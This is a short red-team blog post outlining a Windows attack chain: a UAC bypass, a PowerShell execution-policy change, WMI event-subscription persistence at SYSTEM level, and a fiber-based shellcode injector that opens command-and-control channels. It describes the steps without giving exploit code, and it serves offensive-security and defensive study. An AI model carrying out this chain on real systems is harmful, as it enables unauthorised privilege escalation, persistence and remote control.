CYBER MONGOL
  • Our Journey
  • ASATA
  • Human-Machine Teaming
  • Operator Research
  • Offensive Intelligence
  • Our Journey
  • ASATA
  • Human-Machine Teaming
  • Operator Research
  • Offensive Intelligence
Search by typing & pressing enter

YOUR CART

2/8/2021

UAC Bypass -Fiber Injection -WMI Persistence

​“Recorded Future expects further adoption of open source tools that have recently gained popularity, specifically Covenant, Octopus C2, Sliver, and Mythic." We have strung together some trending, open source tradecraft, utilizing a UAC bypass that has had significant human momentum behind it, showing the potential for serious compromise, with very little modification to the open source tool systems.
 
1. Modify UAC bypass to execute WMIPers.cmd with High integrity
 
2. WMIPers.cmd runs command “PowerShell Set-ExecutionPolicy Unrestricted” to change the execution policy
 
3. WMIPers.cmd executes EventSubWMI.ps1 (High Integrity required) to create a WMI permanent event subscription (SYSTEM). The subscription executes a script when the Windows Store app is opened, firing binary Fibre.exe (a shellcode injector utilizing process fibers to execute)
 
4. WMIPers.cmd also executes Fibre.exe to establish an initial C2 channel in High Integrity
 
5.The Windows Store app is opened, creating a second channel back to the C2 in SYSTEM context
 
*Better OpSec needed (cleanup, windows, etc) for real engagement*
 
#cyberthreatintelligence #infosec #cybersecurity #informationsecurity #threatintelligence #networksecurity #sec #security #tools #offensivesecurity #pentesting #redteam #blueteam

Comments are closed.

    Archives

    February 2021
    January 2021
    September 2020
    August 2020
    July 2020

    Categories

    All

    RSS Feed

contact us:
© COPYRIGHT 2015. ALL RIGHTS RESERVED.